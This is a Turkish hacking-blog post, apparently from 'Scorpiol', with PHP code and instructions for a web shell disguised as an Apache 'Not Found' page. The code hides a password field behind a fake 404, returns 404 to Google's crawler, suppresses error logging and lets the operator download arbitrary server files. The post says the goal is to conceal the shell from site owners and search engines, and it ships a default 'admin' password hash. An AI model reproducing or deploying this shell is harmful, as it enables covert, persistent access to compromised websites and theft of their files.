Görünmez Not Found Shell Yapımı Görünmez Not Found Shell Yapımı Görünmez Not Found Shell Yapımı Görünmez Not Found Shell Yapımı - Scorpiol

Görünmez Not Found Shell Yapımı

# Bu resimde bir sunucuya yüklemiş olduğumuz shelimizi görünmez hali görünmektedir.

# Beklenen etkiler:


# Shell'i site sahibinden gizlemek
# Arama motorlarından gizlemek


# Shell'in bir baskası tarafından bulunmasını engellemek bulunsa dahi şifre ile shell koruması sağlama
# Konuda gerekli olan kodlar aşağıdaki linkte mevcuttur.Dikkat edilmesi gereken hususlar


1- Kodu shelldeki " ?php " ile başlayan satırın altına eklenmelidir aksi halde çalışmaz


2- Koddaki şifre " $auth_pass = "21232f297a57a5a743894a0e4a801fc3" kısmında gecen md5 şifresidir siz bunu kendi md5 iniz ile değiştirerek kendi şifrenizi kullanabilirsiniz.Default şifre "admin" dir.



/* (Scorpiol // Mavi Gölge - Default Sifre :" admin ") */

$auth_pass = "21232f297a57a5a743894a0e4a801fc3";

$color = "#00ff00";

$default_action = 'FilesMan';

@define('SELF_PATH', __FILE__);

if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {

header('HTTP/1.0 404 Not Found');

exit;

}

@session_start();

@error_reporting(0);

@ini_set('error_log',NULL);

@ini_set('log_errors',0);

@ini_set('max_execution_time',0);

@ini_set('output_buffering',0);

@ini_set('display_errors', 0);

@set_time_limit(0);

@set_magic_quotes_runtime(0);

@define('VERSION', '2.1');

if( get_magic_quotes_gpc() ) {

function stripslashes_array($array) {

return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);

}

$_POST = stripslashes_array($_POST);

}

function printLogin() {

?>

<h1>Not Found</h1>

<p>The requested URL was not found on this server.</p>

<hr>

<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>

<style>

input { margin:0;background-color:#fff;border:1px solid #fff; }

</style>

<center>

<form method=post>

<input type=password name=pass>

</form></center>

<?php

exit;

}

if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))

if( empty( $auth_pass ) ||

( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )

$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;

else

printLogin();

@ini_set('log_errors',0);

@ini_set('output_buffering',0);

if(isset($_GET['dl']) && ($_GET['dl'] != "")){

$file = $_GET['dl'];

$filez = @file_get_contents($file);

header("Content-type: application/octet-stream");

header("Content-length: ".strlen($filez));

header("Content-disposition: attachment; filename=\"".basename($file)."\";");

echo $filez;

exit;

}

elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){

$file = $_GET['dlgzip'];

$filez = gzencode(@file_get_contents($file));

header("Content-Type:application/x-gzip\n");

header("Content-length: ".strlen($filez));

header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");

echo $filez;

exit;

}

// view image

if(isset($_GET['img'])){

@ob_clean();

$d = magicboom($_GET['y']);

$f = $_GET['img'];

$inf = @getimagesize($d.$f);

$ext = explode($f,".");

$ext = $ext[count($ext)-1];

@header("Content-type: ".$inf["mime"]);

@header("Cache-control: public");

@header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));

@header("Cache-control: max-age=".(60*60*24*7));

@readfile($d.$f);

exit;

}

0 Yorumlar

Yorum Gönder

Yorum Gönder (0)

Daha yeni Daha eski
Oxygen Chrome
xenforo eklentileri manuel sql injection hacker blog Sunucu Optimizasyon